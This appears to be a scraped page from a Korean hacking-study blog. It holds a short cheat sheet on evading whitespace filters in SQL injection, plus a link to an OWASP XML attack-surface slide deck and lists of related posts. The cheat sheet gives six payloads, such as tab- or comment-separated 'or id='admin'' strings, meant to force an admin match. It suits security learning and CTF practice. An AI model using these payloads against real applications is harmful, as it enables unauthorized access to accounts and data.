설명이 필요 없음.
그냥 첨부물 보고 이해되면 다행이고, 뭔 소린지 모르면, 설명을 해도 소용 없음.
owasp2013-pierreernst-xmlattacksurface-130122204804-phpapp02.pdf
| Python Blind Injection Sample (0) | 2013.03.04 |
|---|---|
| SQL Injection 공백 우회방법 (0) | 2013.03.04 |
| [PHP2EXE] PHP Compiler/Embedder 1.21 (0) | 2013.03.04 |
| .htaccess Attack Sample for PHP (0) | 2013.03.04 |
| webhacking.kr 9번 문제 풀이 (1) | 2013.03.04 |
SQL Injection 공격시 공백 문자 필터링시 우회 방법
1. Tab : %09
- no=1%09or%09id='admin'
2. Line Feed (\n): %0a
- no=1%0aor%0aid='admin'
3. Carrage Return(\r) : %0d
- no=1%0dor%0did='admin'
4. 주석 : /**/
- no=1/**/or/**/id='admin'
5. 괄호 : ()
- no=(1)or(id='admin')
6. 더하기 : +
- no=1+or+id='admin'
| XML Attack Surface (0) | 2013.08.28 |
|---|---|
| Python Blind Injection Sample (0) | 2013.03.04 |
| [PHP2EXE] PHP Compiler/Embedder 1.21 (0) | 2013.03.04 |
| .htaccess Attack Sample for PHP (0) | 2013.03.04 |
| webhacking.kr 9번 문제 풀이 (1) | 2013.03.04 |
